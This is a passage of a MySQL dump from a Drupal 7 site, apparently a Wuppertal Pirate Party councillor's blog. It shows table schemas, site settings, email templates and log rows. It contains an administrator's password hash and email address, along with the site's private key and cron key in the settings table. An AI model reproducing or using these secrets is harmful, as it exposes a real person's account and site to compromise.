TABLES; -- -- Table structure for table `taxonomy_vocabulary` -- DROP TABLE IF EXISTS `taxonomy_vocabulary`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `taxonomy_vocabulary` ( `vid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique vocabulary ID.', `name` varchar(255) NOT NULL DEFAULT '' COMMENT 'Name of the vocabulary.', `machine_name` varchar(255) NOT NULL DEFAULT '' COMMENT 'The vocabulary machine name.', `description` longtext COMMENT 'Description of the vocabulary.', `hierarchy` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'The type of hierarchy allowed within the vocabulary. (0 = disabled, 1 = single, 2 = multiple)', `module` varchar(255) NOT NULL DEFAULT '' COMMENT 'The module which created the vocabulary.', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'The weight of this vocabulary in relation to other vocabularies.', PRIMARY KEY (`vid`), UNIQUE KEY `machine_name` (`machine_name`), KEY `list` (`weight`,`name`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='Stores vocabulary information.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `taxonomy_vocabulary` -- LOCK TABLES `taxonomy_vocabulary` WRITE; /*!40000 ALTER TABLE `taxonomy_vocabulary` DISABLE KEYS */; INSERT INTO `taxonomy_vocabulary` VALUES (1,'Tags','tags','Use tags to group articles on similar topics into categories.',0,'taxonomy',0); /*!40000 ALTER TABLE `taxonomy_vocabulary` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `twitter_block` -- DROP TABLE IF EXISTS `twitter_block`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `twitter_block` ( `bid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'The block’s block.bid.', `info` varchar(128) NOT NULL DEFAULT '' COMMENT 'Block description.', `widget_id` varchar(128) NOT NULL DEFAULT '' COMMENT 'Widget ID.', `username` varchar(128) NOT NULL DEFAULT '' COMMENT 'Account username.', `data` longblob NOT NULL COMMENT 'Serialized data containing the timeline properties.', PRIMARY KEY (`bid`), UNIQUE KEY `info` (`info`), UNIQUE KEY `widget_id` (`widget_id`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='The table for storing twitter blocks.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `twitter_block` -- LOCK TABLES `twitter_block` WRITE; /*!40000 ALTER TABLE `twitter_block` DISABLE KEYS */; INSERT INTO `twitter_block` VALUES (1,'Last Tweets','tweet_block','OlliTal','a:10:{s:5:\"theme\";s:4:\"dark\";s:10:\"link_color\";s:0:\"\";s:5:\"width\";s:3:\"256\";s:6:\"height\";s:3:\"512\";s:6:\"chrome\";a:5:{s:8:\"noheader\";i:0;s:8:\"nofooter\";i:0;s:9:\"noborders\";i:0;s:11:\"noscrollbar\";i:0;s:11:\"transparent\";i:0;}s:12:\"border_color\";s:0:\"\";s:8:\"language\";s:0:\"\";s:11:\"tweet_limit\";s:1:\"3\";s:7:\"related\";s:8:\"@OlliTal\";s:6:\"polite\";s:6:\"polite\";}'); /*!40000 ALTER TABLE `twitter_block` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `url_alias` -- DROP TABLE IF EXISTS `url_alias`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `url_alias` ( `pid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'A unique path alias identifier.', `source` varchar(255) NOT NULL DEFAULT '' COMMENT 'The Drupal path this alias is for; e.g. node/12.', `alias` varchar(255) NOT NULL DEFAULT '' COMMENT 'The alias for this path; e.g. title-of-the-story.', `language` varchar(12) NOT NULL DEFAULT '' COMMENT 'The language this alias is for; if ’und’, the alias will be used for unknown languages. Each Drupal path can have an alias for each supported language.', PRIMARY KEY (`pid`), KEY `alias_language_pid` (`alias`,`language`,`pid`), KEY `source_language_pid` (`source`,`language`,`pid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='A list of URL aliases for Drupal paths; a user may visit...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `url_alias` -- LOCK TABLES `url_alias` WRITE; /*!40000 ALTER TABLE `url_alias` DISABLE KEYS */; /*!40000 ALTER TABLE `url_alias` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `users` -- DROP TABLE IF EXISTS `users`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `users` ( `uid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Primary Key: Unique user ID.', `name` varchar(60) NOT NULL DEFAULT '' COMMENT 'Unique user name.', `pass` varchar(128) NOT NULL DEFAULT '' COMMENT 'User’s password (hashed).', `mail` varchar(254) DEFAULT '' COMMENT 'User’s e-mail address.', `theme` varchar(255) NOT NULL DEFAULT '' COMMENT 'User’s default theme.', `signature` varchar(255) NOT NULL DEFAULT '' COMMENT 'User’s signature.', `signature_format` varchar(255) DEFAULT NULL COMMENT 'The filter_format.format of the signature.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'Timestamp for when user was created.', `access` int(11) NOT NULL DEFAULT '0' COMMENT 'Timestamp for previous time user accessed the site.', `login` int(11) NOT NULL DEFAULT '0' COMMENT 'Timestamp for user’s last login.', `status` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Whether the user is active(1) or blocked(0).', `timezone` varchar(32) DEFAULT NULL COMMENT 'User’s time zone.', `language` varchar(12) NOT NULL DEFAULT '' COMMENT 'User’s default language.', `picture` int(11) NOT NULL DEFAULT '0' COMMENT 'Foreign key: file_managed.fid of user’s picture.', `init` varchar(254) DEFAULT '' COMMENT 'E-mail address used for initial account creation.', `data` longblob COMMENT 'A serialized array of name value pairs that are related to the user. Any form values posted during user edit are stored and are loaded into the $user object during user_load(). Use of this field is discouraged and it will likely disappear in a future...', PRIMARY KEY (`uid`), UNIQUE KEY `name` (`name`), KEY `access` (`access`), KEY `created` (`created`), KEY `mail` (`mail`), KEY `picture` (`picture`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores user data.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `users` -- LOCK TABLES `users` WRITE; /*!40000 ALTER TABLE `users` DISABLE KEYS */; INSERT INTO `users` VALUES (0,'','','','','',NULL,0,0,0,0,NULL,'',0,'',NULL),(1,'Olli','$S$D9iU3HlPJ37cFFLlKnaOyjEv.pjn6clJKE3UlY5UuGRd2K0LquQg','olli@ollital.de','','',NULL,1426848470,1449694804,1447969331,1,'Europe/Berlin','',0,'olli@ollital.de','b:0;'); /*!40000 ALTER TABLE `users` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `users_roles` -- DROP TABLE IF EXISTS `users_roles`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `users_roles` ( `uid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Primary Key: users.uid for user.', `rid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Primary Key: role.rid for role.', PRIMARY KEY (`uid`,`rid`), KEY `rid` (`rid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Maps users to roles.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `users_roles` -- LOCK TABLES `users_roles` WRITE; /*!40000 ALTER TABLE `users_roles` DISABLE KEYS */; INSERT INTO `users_roles` VALUES (1,3); /*!40000 ALTER TABLE `users_roles` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `variable` -- DROP TABLE IF EXISTS `variable`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `variable` ( `name` varchar(128) NOT NULL DEFAULT '' COMMENT 'The name of the variable.', `value` longblob NOT NULL COMMENT 'The value of the variable.', PRIMARY KEY (`name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Named variable/value pairs created by Drupal core or any...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `variable` -- LOCK TABLES `variable` WRITE; /*!40000 ALTER TABLE `variable` DISABLE KEYS */; INSERT INTO `variable` VALUES ('admin_theme','s:5:\"seven\";'),('adsense_access_pages','s:0:\"\";'),('adsense_basic_id','s:20:\"pub-4101373333307108\";'),('adsense_click_tracking','i:1;'),('adsense_click_tracking_name_resolve','i:1;'),('adsense_disable','i:0;'),('adsense_id_module','s:13:\"adsense_basic\";'),('adsense_oldcode_ad_block_0','s:27:\"Add+Sense:468x60:1:1:center\";'),('adsense_placeholder','i:1;'),('adsense_placeholder_text','s:14:\"Google AdSense\";'),('adsense_secret_adtest','i:0;'),('adsense_secret_language','s:0:\"\";'),('adsense_section_targeting','i:1;'),('adsense_test_mode','i:1;'),('adsense_unblock_ads','i:0;'),('adsense_visibility','s:1:\"0\";'),('anonymous','s:9:\"Anonymous\";'),('clean_url','s:1:\"0\";'),('color_bartik_files','a:2:{i:0;s:39:\"public://color/bartik-56d50557/logo.png\";i:1;s:41:\"public://color/bartik-56d50557/colors.css\";}'),('color_bartik_logo','s:39:\"public://color/bartik-56d50557/logo.png\";'),('color_bartik_palette','a:9:{s:3:\"top\";s:7:\"#c7750f\";s:6:\"bottom\";s:7:\"#c7380f\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f6f6f2\";s:14:\"sidebarborders\";s:7:\"#f9f9f9\";s:6:\"footer\";s:7:\"#292929\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0071B3\";}'),('color_bartik_stylesheets','a:1:{i:0;s:41:\"public://color/bartik-56d50557/colors.css\";}'),('color_responsive_bartik_files','a:2:{i:0;s:50:\"public://color/responsive_bartik-d0475e58/logo.png\";i:1;s:52:\"public://color/responsive_bartik-d0475e58/colors.css\";}'),('color_responsive_bartik_logo','s:50:\"public://color/responsive_bartik-d0475e58/logo.png\";'),('color_responsive_bartik_palette','a:9:{s:3:\"top\";s:7:\"#8e2105\";s:6:\"bottom\";s:7:\"#c3741d\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f6f6f2\";s:14:\"sidebarborders\";s:7:\"#f9f9f9\";s:6:\"footer\";s:7:\"#292929\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0071B3\";}'),('color_responsive_bartik_stylesheets','a:1:{i:0;s:52:\"public://color/responsive_bartik-d0475e58/colors.css\";}'),('comment_page','i:0;'),('configurable_timezones','i:1;'),('cron_key','s:43:\"JPDDA7rlRpp1WMsbNvF6rOZOA2x2SGsiRDMA8yPtkZM\";'),('cron_last','i:1451358983;'),('cron_safe_threshold','s:5:\"21600\";'),('css_js_query_string','s:6:\"nwa2ys\";'),('date_default_timezone','s:13:\"Europe/Berlin\";'),('date_first_day','s:1:\"1\";'),('default_nodes_main','s:2:\"10\";'),('drupal_http_request_fails','b:0;'),('drupal_private_key','s:43:\"kJdWssORlZVxf4_00HrHYW_Uc1uL9uw59cuWZSdAvsw\";'),('email__active_tab','s:24:\"edit-email-admin-created\";'),('empty_timezone_message','i:0;'),('file_temporary_path','s:4:\"/tmp\";'),('filter_fallback_format','s:10:\"plain_text\";'),('install_profile','s:8:\"standard\";'),('install_task','s:4:\"done\";'),('install_time','i:1426848645;'),('maintenance_mode','b:0;'),('maintenance_mode_message','s:103:\"Pirat im Talrat is currently under maintenance. We should be back shortly. Thank you for your patience.\";'),('menu_expanded','a:0:{}'),('menu_masks','a:34:{i:0;i:501;i:1;i:493;i:2;i:250;i:3;i:247;i:4;i:246;i:5;i:245;i:6;i:125;i:7;i:123;i:8;i:122;i:9;i:121;i:10;i:117;i:11;i:63;i:12;i:62;i:13;i:61;i:14;i:60;i:15;i:59;i:16;i:58;i:17;i:44;i:18;i:31;i:19;i:30;i:20;i:29;i:21;i:28;i:22;i:24;i:23;i:21;i:24;i:15;i:25;i:14;i:26;i:13;i:27;i:11;i:28;i:7;i:29;i:6;i:30;i:5;i:31;i:3;i:32;i:2;i:33;i:1;}'),('node_admin_theme','s:1:\"1\";'),('node_cron_last','s:10:\"1446488130\";'),('node_options_page','a:1:{i:0;s:6:\"status\";}'),('node_submitted_page','b:0;'),('path_alias_whitelist','a:0:{}'),('site_403','s:0:\"\";'),('site_404','s:0:\"\";'),('site_default_country','s:2:\"DE\";'),('site_frontpage','s:4:\"node\";'),('site_mail','s:20:\"piratolli@ollital.de\";'),('site_name','s:15:\"Pirat im Talrat\";'),('site_slogan','s:44:\"Informationen vom Piraten im Wuppertaler Rat\";'),('statistics_day_timestamp','i:1451312069;'),('theme_bartik_settings','a:18:{s:11:\"toggle_logo\";i:1;s:11:\"toggle_name\";i:1;s:13:\"toggle_slogan\";i:1;s:24:\"toggle_node_user_picture\";i:1;s:27:\"toggle_comment_user_picture\";i:1;s:32:\"toggle_comment_user_verification\";i:1;s:14:\"toggle_favicon\";i:1;s:16:\"toggle_main_menu\";i:1;s:21:\"toggle_secondary_menu\";i:1;s:12:\"default_logo\";i:0;s:9:\"logo_path\";s:31:\"public://Piratensegel Klein.png\";s:15:\"default_favicon\";i:1;s:12:\"favicon_path\";s:0:\"\";s:14:\"favicon_upload\";s:0:\"\";s:6:\"scheme\";s:0:\"\";s:7:\"palette\";a:9:{s:3:\"top\";s:7:\"#c7750f\";s:6:\"bottom\";s:7:\"#c7380f\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f6f6f2\";s:14:\"sidebarborders\";s:7:\"#f9f9f9\";s:6:\"footer\";s:7:\"#292929\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0071B3\";}s:5:\"theme\";s:6:\"bartik\";s:4:\"info\";a:12:{s:6:\"fields\";a:9:{s:3:\"top\";s:10:\"Header top\";s:6:\"bottom\";s:13:\"Header bottom\";s:2:\"bg\";s:15:\"Main background\";s:7:\"sidebar\";s:18:\"Sidebar background\";s:14:\"sidebarborders\";s:15:\"Sidebar borders\";s:6:\"footer\";s:17:\"Footer background\";s:11:\"titleslogan\";s:16:\"Title and slogan\";s:4:\"text\";s:10:\"Text color\";s:4:\"link\";s:10:\"Link color\";}s:7:\"schemes\";a:6:{s:7:\"default\";a:2:{s:5:\"title\";s:21:\"Blue Lagoon (default)\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#0779bf\";s:6:\"bottom\";s:7:\"#48a9e4\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f6f6f2\";s:14:\"sidebarborders\";s:7:\"#f9f9f9\";s:6:\"footer\";s:7:\"#292929\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0071B3\";}}s:9:\"firehouse\";a:2:{s:5:\"title\";s:9:\"Firehouse\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#cd2d2d\";s:6:\"bottom\";s:7:\"#cf3535\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f1f4f0\";s:14:\"sidebarborders\";s:7:\"#ededed\";s:6:\"footer\";s:7:\"#1f1d1c\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#d6121f\";}}s:3:\"ice\";a:2:{s:5:\"title\";s:3:\"Ice\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#d0d0d0\";s:6:\"bottom\";s:7:\"#c2c4c5\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#ffffff\";s:14:\"sidebarborders\";s:7:\"#cccccc\";s:6:\"footer\";s:7:\"#24272c\";s:11:\"titleslogan\";s:7:\"#000000\";s:4:\"text\";s:7:\"#4a4a4a\";s:4:\"link\";s:7:\"#019dbf\";}}s:4:\"plum\";a:2:{s:5:\"title\";s:4:\"Plum\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#4c1c58\";s:6:\"bottom\";s:7:\"#593662\";s:2:\"bg\";s:7:\"#fffdf7\";s:7:\"sidebar\";s:7:\"#edede7\";s:14:\"sidebarborders\";s:7:\"#e7e7e7\";s:6:\"footer\";s:7:\"#2c2c28\";s:11:\"titleslogan\";s:7:\"#ffffff\";s:4:\"text\";s:7:\"#301313\";s:4:\"link\";s:7:\"#9d408d\";}}s:5:\"slate\";a:2:{s:5:\"title\";s:5:\"Slate\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#4a4a4a\";s:6:\"bottom\";s:7:\"#4e4e4e\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#ffffff\";s:14:\"sidebarborders\";s:7:\"#d0d0d0\";s:6:\"footer\";s:7:\"#161617\";s:11:\"titleslogan\";s:7:\"#ffffff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0073b6\";}}s:0:\"\";a:2:{s:5:\"title\";s:6:\"Custom\";s:6:\"colors\";a:0:{}}}s:3:\"css\";a:1:{i:0;s:14:\"css/colors.css\";}s:4:\"copy\";a:1:{i:0;s:8:\"logo.png\";}s:9:\"gradients\";a:1:{i:0;a:3:{s:9:\"dimension\";a:4:{i:0;i:0;i:1;i:0;i:2;i:0;i:3;i:0;}s:9:\"direction\";s:8:\"vertical\";s:6:\"colors\";a:2:{i:0;s:3:\"top\";i:1;s:6:\"bottom\";}}}s:4:\"fill\";a:0:{}s:6:\"slices\";a:0:{}s:12:\"blend_target\";s:7:\"#ffffff\";s:11:\"preview_css\";s:17:\"color/preview.css\";s:10:\"preview_js\";s:16:\"color/preview.js\";s:12:\"preview_html\";s:18:\"color/preview.html\";s:10:\"base_image\";s:14:\"color/base.png\";}}'),('theme_default','s:17:\"responsive_bartik\";'),('theme_responsive_bartik_settings','a:19:{s:11:\"toggle_logo\";i:1;s:11:\"toggle_name\";i:1;s:13:\"toggle_slogan\";i:1;s:24:\"toggle_node_user_picture\";i:1;s:27:\"toggle_comment_user_picture\";i:1;s:32:\"toggle_comment_user_verification\";i:1;s:14:\"toggle_favicon\";i:1;s:16:\"toggle_main_menu\";i:1;s:21:\"toggle_secondary_menu\";i:1;s:12:\"default_logo\";i:0;s:9:\"logo_path\";s:32:\"public://120px-PIRATENsignet.png\";s:11:\"logo_upload\";s:0:\"\";s:15:\"default_favicon\";i:0;s:12:\"favicon_path\";s:49:\"public://eababaad47803cb6543076898ba0ae58.ico.png\";s:6:\"scheme\";s:0:\"\";s:7:\"palette\";a:9:{s:3:\"top\";s:7:\"#8e2105\";s:6:\"bottom\";s:7:\"#c3741d\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f6f6f2\";s:14:\"sidebarborders\";s:7:\"#f9f9f9\";s:6:\"footer\";s:7:\"#292929\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0071B3\";}s:5:\"theme\";s:17:\"responsive_bartik\";s:4:\"info\";a:12:{s:6:\"fields\";a:9:{s:3:\"top\";s:10:\"Header top\";s:6:\"bottom\";s:13:\"Header bottom\";s:2:\"bg\";s:15:\"Main background\";s:7:\"sidebar\";s:18:\"Sidebar background\";s:14:\"sidebarborders\";s:15:\"Sidebar borders\";s:6:\"footer\";s:17:\"Footer background\";s:11:\"titleslogan\";s:16:\"Title and slogan\";s:4:\"text\";s:10:\"Text color\";s:4:\"link\";s:10:\"Link color\";}s:7:\"schemes\";a:6:{s:7:\"default\";a:2:{s:5:\"title\";s:21:\"Blue Lagoon (default)\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#055a8e\";s:6:\"bottom\";s:7:\"#1d84c3\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f6f6f2\";s:14:\"sidebarborders\";s:7:\"#f9f9f9\";s:6:\"footer\";s:7:\"#292929\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0071B3\";}}s:9:\"firehouse\";a:2:{s:5:\"title\";s:9:\"Firehouse\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#cd2d2d\";s:6:\"bottom\";s:7:\"#cf3535\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f1f4f0\";s:14:\"sidebarborders\";s:7:\"#ededed\";s:6:\"footer\";s:7:\"#1f1d1c\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#d6121f\";}}s:3:\"ice\";a:2:{s:5:\"title\";s:3:\"Ice\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#d0d0d0\";s:6:\"bottom\";s:7:\"#c2c4c5\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#ffffff\";s:14:\"sidebarborders\";s:7:\"#cccccc\";s:6:\"footer\";s:7:\"#24272c\";s:11:\"titleslogan\";s:7:\"#000000\";s:4:\"text\";s:7:\"#4a4a4a\";s:4:\"link\";s:7:\"#019dbf\";}}s:4:\"plum\";a:2:{s:5:\"title\";s:4:\"Plum\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#4c1c58\";s:6:\"bottom\";s:7:\"#593662\";s:2:\"bg\";s:7:\"#fffdf7\";s:7:\"sidebar\";s:7:\"#edede7\";s:14:\"sidebarborders\";s:7:\"#e7e7e7\";s:6:\"footer\";s:7:\"#2c2c28\";s:11:\"titleslogan\";s:7:\"#ffffff\";s:4:\"text\";s:7:\"#301313\";s:4:\"link\";s:7:\"#9d408d\";}}s:5:\"slate\";a:2:{s:5:\"title\";s:5:\"Slate\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#4a4a4a\";s:6:\"bottom\";s:7:\"#4e4e4e\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#ffffff\";s:14:\"sidebarborders\";s:7:\"#d0d0d0\";s:6:\"footer\";s:7:\"#161617\";s:11:\"titleslogan\";s:7:\"#ffffff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0073b6\";}}s:0:\"\";a:2:{s:5:\"title\";s:6:\"Custom\";s:6:\"colors\";a:0:{}}}s:3:\"css\";a:1:{i:0;s:14:\"css/colors.css\";}s:4:\"copy\";a:1:{i:0;s:8:\"logo.png\";}s:9:\"gradients\";a:1:{i:0;a:3:{s:9:\"dimension\";a:4:{i:0;i:0;i:1;i:0;i:2;i:0;i:3;i:0;}s:9:\"direction\";s:8:\"vertical\";s:6:\"colors\";a:2:{i:0;s:3:\"top\";i:1;s:6:\"bottom\";}}}s:4:\"fill\";a:0:{}s:6:\"slices\";a:0:{}s:12:\"blend_target\";s:7:\"#ffffff\";s:11:\"preview_css\";s:17:\"color/preview.css\";s:10:\"preview_js\";s:16:\"color/preview.js\";s:12:\"preview_html\";s:18:\"color/preview.html\";s:10:\"base_image\";s:14:\"color/base.png\";}s:16:\"favicon_mimetype\";s:9:\"image/png\";}'),('update_last_check','i:1451312074;'),('update_last_email_notification','i:1445543400;'),('update_notify_emails','a:1:{i:0;s:15:\"olli@ollital.de\";}'),('user_admin_role','s:1:\"3\";'),('user_cancel_method','s:17:\"user_cancel_block\";'),('user_default_timezone','s:1:\"0\";'),('user_email_verification','i:1;'),('user_mail_cancel_confirm_body','s:381:\"[user:name],\r\n\r\nA request to cancel your account has been made at [site:name].\r\n\r\nYou may now cancel your account on [site:url-brief] by clicking this link or copying and pasting it into your browser:\r\n\r\n[user:cancel-url]\r\n\r\nNOTE: The cancellation of your account is not reversible.\r\n\r\nThis link expires in one day and nothing will happen if it is not used.\r\n\r\n-- [site:name] team\";'),('user_mail_cancel_confirm_subject','s:59:\"Account cancellation request for [user:name] at [site:name]\";'),('user_mail_password_reset_body','s:407:\"[user:name],\r\n\r\nA request to reset the password for your account has been made at [site:name].\r\n\r\nYou may now log in by clicking this link or copying and pasting it to your browser:\r\n\r\n[user:one-time-login-url]\r\n\r\nThis link can only be used once to log in and will lead you to a page where you can set your password. It expires after one day and nothing will happen if it\'s not used.\r\n\r\n-- [site:name] team\";'),('user_mail_password_reset_subject','s:60:\"Replacement login information for [user:name] at [site:name]\";'),('user_mail_register_admin_created_body','s:476:\"[user:name],\r\n\r\nA site administrator at [site:name] has created an account for you. You may now log in by clicking this link or copying and pasting it to your browser:\r\n\r\n[user:one-time-login-url]\r\n\r\nThis link can only be used once to log in and will lead you to a page where you can set your password.\r\n\r\nAfter setting your password, you will be able to log in at [site:login-url] in the future using:\r\n\r\nusername: [user:name]\r\npassword: Your password\r\n\r\n-- [site:name] team\";'),('user_mail_register_admin_created_subject','s:58:\"An administrator created an account for you at [site:name]\";'),('user_mail_register_no_approval_required_body','s:450:\"[user:name],\r\n\r\nThank you for registering at [site:name]. You may now log in by clicking this link or copying and pasting it to your browser:\r\n\r\n[user:one-time-login-url]\r\n\r\nThis link can only be used once to log in and will lead you to a page where you can set your password.\r\n\r\nAfter setting your password, you will be able to log in at [site:login-url] in the future using:\r\n\r\nusername: [user:name]\r\npassword: Your password\r\n\r\n-- [site:name] team\";'),('user_mail_register_no_approval_required_subject','s:46:\"Account details for [user:name] at [site:name]\";'),('user_mail_register_pending_approval_body','s:287:\"[user:name],\r\n\r\nThank you for registering at [site:name]. Your application for an account is currently pending approval. Once it has been approved, you will receive another e-mail containing information about how to log in, set your password, and other details.\r\n\r\n\r\n-- [site:name] team\";'),('user_mail_register_pending_approval_subject','s:71:\"Account details for [user:name] at [site:name] (pending admin approval)\";'),('user_mail_status_activated_body','s:461:\"[user:name],\r\n\r\nYour account at [site:name] has been activated.\r\n\r\nYou may now log in by clicking this link or copying and pasting it into your browser:\r\n\r\n[user:one-time-login-url]\r\n\r\nThis link can only be used once to log in and will lead you to a page where you can set your password.\r\n\r\nAfter setting your password, you will be able to log in at [site:login-url] in the future using:\r\n\r\nusername: [user:name]\r\npassword: Your password\r\n\r\n-- [site:name] team\";'),('user_mail_status_activated_notify','i:1;'),('user_mail_status_activated_subject','s:57:\"Account details for [user:name] at [site:name] (approved)\";'),('user_mail_status_blocked_body','s:85:\"[user:name],\r\n\r\nYour account on [site:name] has been blocked.\r\n\r\n-- [site:name] team\";'),('user_mail_status_blocked_notify','i:0;'),('user_mail_status_blocked_subject','s:56:\"Account details for [user:name] at [site:name] (blocked)\";'),('user_mail_status_canceled_body','s:86:\"[user:name],\r\n\r\nYour account on [site:name] has been canceled.\r\n\r\n-- [site:name] team\";'),('user_mail_status_canceled_notify','i:0;'),('user_mail_status_canceled_subject','s:57:\"Account details for [user:name] at [site:name] (canceled)\";'),('user_pictures','i:1;'),('user_picture_default','s:0:\"\";'),('user_picture_dimensions','s:9:\"1024x1024\";'),('user_picture_file_size','s:3:\"800\";'),('user_picture_guidelines','s:0:\"\";'),('user_picture_path','s:8:\"pictures\";'),('user_picture_style','s:9:\"thumbnail\";'),('user_register','s:1:\"0\";'),('user_signatures','i:0;'); /*!40000 ALTER TABLE `variable` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `watchdog` -- DROP TABLE IF EXISTS `watchdog`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `watchdog` ( `wid` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique watchdog event ID.', `uid` int(11) NOT NULL DEFAULT '0' COMMENT 'The users.uid of the user who triggered the event.', `type` varchar(64) NOT NULL DEFAULT '' COMMENT 'Type of log message, for example "user" or "page not found."', `message` longtext NOT NULL COMMENT 'Text of log message to be passed into the t() function.', `variables` longblob NOT NULL COMMENT 'Serialized array of variables that match the message string and that is passed into the t() function.', `severity` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'The severity level of the event; ranges from 0 (Emergency) to 7 (Debug)', `link` varchar(255) DEFAULT '' COMMENT 'Link to view the result of the event.', `location` text NOT NULL COMMENT 'URL of the origin of the event.', `referer` text COMMENT 'URL of referring page.', `hostname` varchar(128) NOT NULL DEFAULT '' COMMENT 'Hostname of the user who triggered the event.', `timestamp` int(11) NOT NULL DEFAULT '0' COMMENT 'Unix timestamp of when event occurred.', PRIMARY KEY (`wid`), KEY `type` (`type`), KEY `uid` (`uid`), KEY `severity` (`severity`) ) ENGINE=InnoDB AUTO_INCREMENT=2519 DEFAULT CHARSET=utf8 COMMENT='Table that contains logs of all system events.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `watchdog` -- LOCK TABLES `watchdog` WRITE; /*!40000 ALTER TABLE `watchdog` DISABLE KEYS */; INSERT INTO `watchdog` VALUES (1518,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.t9s.info/cms/?q=user','','66.249.67.54',1438061576),(1519,0,'cron','Cron run completed.','a:0:{}',5,'','http://t9s.info/cms/','','157.55.39.12',1438088450),(1520,0,'access denied','node/add','N;',4,'','http://www.t9s.info/cms/?q=node/add','http://www.t9s.info/','23.247.182.243',1438109278),(1521,0,'access denied','user/register','N;',4,'','http://www.t9s.info/cms/?q=user/register','http://www.t9s.info/cms/?q=node/add','23.247.182.243',1438109278),(1522,0,'cron','Cron run 